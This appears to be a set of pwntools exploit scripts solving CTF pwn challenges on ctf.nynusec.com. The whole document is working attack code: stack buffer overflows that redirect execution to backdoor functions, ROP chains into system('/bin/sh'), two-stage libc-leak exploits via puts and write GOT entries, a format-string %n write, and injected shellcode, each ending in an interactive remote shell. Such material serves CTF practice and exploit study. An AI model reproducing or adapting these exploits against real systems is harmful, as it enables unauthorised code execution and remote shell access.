Hello_Pwn

nc直接连接即可

hello_pwn2

from pwn import *

#start
# Open the connection; this script sends straight away without reading a banner.
r = remote("ctf.nynusec.com",28944)

#params
# Four filler bytes followed by one 8-byte little-endian value.
FILLER = b"M" * 4
TARGET_VALUE = 0x6E756161  # presumably the value the service compares against — confirm in the binary

#attack
payload = b"".join([FILLER, p64(TARGET_VALUE)])
r.sendline(payload)

r.interactive()

pwnpwn

from pwn import *

#start
r = remote("ctf.nynusec.com",28928)

#params
# Address the overwritten return address is pointed at (hard-coded; no PIE assumed).
backdoor = 0x400596
# 0x88 filler bytes — presumably the distance from the input buffer to the saved return address; verify in a debugger.
PAD_LEN = 0x88

#attack
payload = b"".join([b"M" * PAD_LEN, p64(backdoor)])
# Drain the prompt first so the service's output does not interleave with the reply.
r.recv()
r.sendline(payload)

r.interactive()

easyStack

from turtle import back  # NOTE(review): stray IDE auto-import, never used; it pulls in tkinter and fails on headless hosts — safe to delete
from pwn import *

#start
r = remote("ctf.nynusec.com",28599)

#params
# Resolve the target symbol from the local copy of the binary instead of hard-coding it.
elf = ELF("easyStack")
backdoor = elf.symbols['fun']
PAD_LEN = 0x18  # presumably the buffer-to-saved-return-address distance; confirm against the binary

#attack
filler = b"M" * PAD_LEN
payload = filler + p64(backdoor)
r.recv()
r.sendline(payload)


r.interactive()

rop_test

from pwn import *

#start
r = remote("ctf.nynusec.com",28686)
elf = ELF("rop_test")

#params
system_addr = elf.symbols['system']
bin_sh_addr = 0x804A024  # hard-coded; presumably a "/bin/sh" string inside the binary — confirm with elf.search
PAD_LEN = 0x88 + 4       # buffer plus the 4-byte saved ebp (presumed 32-bit frame layout)

#attack
# 32-bit call frame: the callee address, a 4-byte dummy return address, then its single argument.
frame = [b"M" * PAD_LEN, p32(system_addr), b"M" * 4, p32(bin_sh_addr)]
payload = b"".join(frame)
r.recv()
r.sendline(payload)

r.interactive()

pwn_string

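from pwn import *

#start
# Set the context before anything else so asm()/shellcraft below see amd64.
context(log_level = 'debug', arch = 'amd64', os = 'linux')
r = remote("ctf.nynusec.com",28836)

#params
# Format string: prints 85 characters, then stores that count through the pointer
# found at argument 7 — presumably the address sent a few lines below; confirm against the binary.
payload = b'%85d%7$n'

#attack
# All tube I/O is done with bytes: pwntools 4.x warns on str arguments and newer releases reject them.
r.recvuntil(b'secret[0] is ')
addr = int(r.recvline(), 16)  # int() accepts bytes and tolerates the trailing newline
r.sendlineafter(b'be:', b'aaa')
r.sendlineafter(b'up?:', b'east')
r.sendlineafter(b'leave(0)?:', b'1')
r.sendlineafter(b"address'", str(addr).encode())
r.sendlineafter(b'is:', payload)
shellcode = asm(shellcraft.sh())
r.sendlineafter(b'SPELL', shellcode)

r.interactive()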

pwn_guess

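from pwn import *

#start
r=remote("ctf.nynusec.com",28690)

#params
# 0x20 filler bytes, then the value 1 written over whatever follows the name buffer (presumed layout — verify).
payload = b'M'*0x20 + p64(1)
# Ten pre-computed answers; presumably the sequence the service expects after the overwrite above — verify.
guesses = [2,5,4,2,6,2,5,1,4,2]

#attack
r.recvuntil(b"name:")
r.sendline(payload)

# The original loop body was not indented (IndentationError); each answer now goes out inside the loop, as bytes.
for guess in guesses:
    r.sendlineafter(b"Please input your guess number:", str(guess).encode())

r.interactive()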

pwn_int

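from pwn import *

#start
r = remote("ctf.nynusec.com",28599)

#params
backdoor = 0x804868B
PAD_LEN = 0x14 + 4   # buffer plus the 4-byte saved ebp (presumed 32-bit frame layout)
TOTAL_LEN = 259      # the line is padded to this length; presumably what the service's length check accepts — verify

#attack
# Menu interaction, all as bytes (pwntools deprecates str arguments to send/sendline).
r.recv()
r.sendline(b"1")
r.recv()
r.sendline(b"m0sway")
r.recv()
payload = b'M' * PAD_LEN + p32(backdoor)
payload = payload.ljust(TOTAL_LEN, b'M')
r.sendline(payload)

r.interactive()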

S2-stack

from matplotlib import interactive  # NOTE(review): stray IDE auto-import, never used (r.interactive is a tube method) — safe to delete
from pwn import *

#start
r = remote("ctf.nynusec.com",28052)

#params
backdoor = 0x804850F
PAD_LEN = 9 + 4  # 9-byte buffer plus the 4-byte saved ebp (presumed 32-bit frame layout)

#attack
payload = b"".join([b"M" * PAD_LEN, p32(backdoor)])
r.recv()
r.sendline(payload)

r.interactive()

S2-pwn1-rop

from pwn import *

#start
r = remote("ctf.nynusec.com",28482)
elf = ELF("S2-pwn1-rop")

#params
rdi_addr = 0x400683     # presumably a `pop rdi; ret` gadget — confirm against the binary
bin_sh_addr = 0x601048  # presumably the "/bin/sh" string in the binary — confirm with elf.search
system_addr = elf.plt['system']
PAD_LEN = 0x10 + 8      # buffer plus the 8-byte saved rbp (presumed layout)

#attack
# amd64 chain: load the argument register, then return into system@plt.
chain = [p64(rdi_addr), p64(bin_sh_addr), p64(system_addr)]
payload = b"M" * PAD_LEN + b"".join(chain)
r.recv()
r.sendline(payload)

r.interactive()

S2-pwn2-libc-rop

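from pwn import *
from LibcSearcher import *  # NOTE(review): unused — the LibcSearcher path below is commented out

#start
r = remote("ctf.nynusec.com",28455)
# This file must be the exact libc build the remote runs; a different build makes every offset below silently wrong.
lib = ELF("../buu/ubuntu18(64).so")
elf = ELF("PWN_libc")

#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400c83       # presumably a `pop rdi; ret` gadget — confirm against the binary
main_addr = elf.symbols['main']
ret=0x4006b9              # presumably a lone `ret`, inserted before the second chain for stack alignment — confirm
PAD_LEN = 0x50 + 8 - 1    # buffer plus saved rbp, minus the leading NUL byte sent first (presumed layout)


def menu_send(data):
    """Choose menu option 1, then send *data* as the following input (bytes only)."""
    r.recv()
    r.sendline(b'1')
    r.recv()
    r.sendline(data)


#attack
# Stage 1: call puts on puts@got to leak its libc address, then return to main for a second round.
payload = b'\x00' + b'M'*PAD_LEN + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
menu_send(payload)
r.recvline()
r.recvline()
# recvn(6) blocks until all six bytes are in; recv(6) may return a short read and u64 would raise.
puts_addr = u64(r.recvn(6).ljust(8,b'\x00'))

# libc
base_addr = puts_addr - lib.symbols['puts']
system_addr = base_addr + lib.symbols['system']
bin_sh_addr = base_addr + next(lib.search(b'/bin/sh'))
# Alternative when the libc file is unknown (kept for reference):
# obj = LibcSearcher("puts", puts_addr)
# base_addr = puts_addr >> 24
# base_addr = base_addr << 24
# system_addr = base_addr+ obj.dump("system") # system offset
# bin_sh_addr = base_addr+ obj.dump("str_bin_sh") # /bin/sh offset

#attack2
payload2 = b'\x00' + b'M'*PAD_LEN + p64(ret) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
menu_send(payload2)

r.interactive()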

libcc

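from pwn import *

#start
# r = process("level3")
r = remote("ctf.nynusec.com",28249)
elf = ELF("level3")
# Must be the exact libc the remote runs; a different build makes every offset below wrong.
libc = ELF("libc6-i386_2.23-0ubuntu11.3_amd64.so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']
PAD_LEN = 0x88 + 4   # buffer plus the 4-byte saved ebp (presumed 32-bit frame layout)

#attack
# Stage 1: call write(1, write@got, 4), returning to main afterwards, to leak write's libc address.
payload = b'M'*PAD_LEN + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.sendlineafter(b"Input:\n",payload)
# recvn(4) waits for all four bytes; recv(4) may return a short read and u32 would raise.
write_addr = u32(r.recvn(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
# Stage 2: 32-bit call frame into system with a 4-byte dummy return address and the "/bin/sh" pointer.
payload2 = b'M'*PAD_LEN + p32(system_addr) + b'M'*4 + p32(bin_sh_addr)
r.sendlineafter(b"Input:\n",payload2)

r.interactive()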

PWN-libc

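from git import base  # NOTE(review): stray IDE auto-import, never used (and shadows nothing needed) — safe to delete
from pwn import *
from LibcSearcher import *  # NOTE(review): unused — the LibcSearcher path below is commented out

#start
# r = process("PWN_libc")
# r = remote("node4.buuoj.cn",28654)
r = remote("ctf.nynusec.com",28654)
# This file must be the exact libc build the remote runs; a different build makes every offset below silently wrong.
lib = ELF("libc.23.so")
elf = ELF("PWN_libc")

#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400c83       # presumably a `pop rdi; ret` gadget — confirm against the binary
main_addr = elf.symbols['main']
# ret=0x4006b9
PAD_LEN = 0x50 + 8 - 1    # buffer plus saved rbp, minus the leading NUL byte sent first (presumed layout)


def menu_send(data):
    """Choose menu option 1, then send *data* as the following input (bytes only)."""
    r.recv()
    r.sendline(b'1')
    r.recv()
    r.sendline(data)


#attack
# Stage 1: call puts on puts@got to leak its libc address, then return to main for a second round.
payload = b'\x00' + b'M'*PAD_LEN + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
menu_send(payload)
r.recvline()
r.recvline()
# recvn(6) blocks until all six bytes are in; recv(6) may return a short read and u64 would raise.
puts_addr = u64(r.recvn(6).ljust(8,b'\x00'))

# libc
base_addr = puts_addr - lib.symbols['puts']
system_addr = base_addr + lib.symbols['system']
bin_sh_addr = base_addr + next(lib.search(b"/bin/sh"))
one_gadget_addr = 0x45216 + base_addr  # computed but unused below; offset is specific to this libc build
# Alternative when the libc file is unknown (kept for reference):
# obj = LibcSearcher("puts", puts_addr)
# base_addr = puts_addr >> 24
# base_addr = base_addr << 24
# system_addr = base_addr+ obj.dump("system") # system offset
# bin_sh_addr = base_addr+ obj.dump("str_bin_sh") # /bin/sh offset

#attack2
payload2 = b'\x00' + b'M'*PAD_LEN + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
menu_send(payload2)

r.interactive()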